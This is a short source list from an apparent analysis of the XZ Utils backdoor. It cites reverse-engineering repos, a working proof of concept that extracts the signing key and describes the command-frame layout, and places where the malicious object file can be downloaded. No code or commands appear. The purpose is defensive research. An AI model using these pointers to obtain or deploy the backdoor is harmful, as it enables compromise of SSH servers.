  • smx-smx/xzre - runtime reverse-engineering of the malicious .o. Source for the symbol names (_get_cpuid, _cpuid, .Lx86_code.part.0), the GOT-rewrite mechanism, and the binary itself (downloadable from the repo root).
  • amlweems/xzbot - working proof-of-concept. Extracts the Ed448 public key, documents the modulus-as-frame layout (tag · signature · command), and ships a honeypot patch for OpenSSH.
  • Binarly - XZ backdoor analysis - independent extraction of the .o from a real distro .deb. Different sha-256 from xzre’s copy, identical structure - useful for cross-verification.
  • Gynvael Coldwind - deep dive - second-source corroboration of the runtime-payload analysis, with a different reverser’s lens on the same artifact.

Maintainer & community response

Attribution sources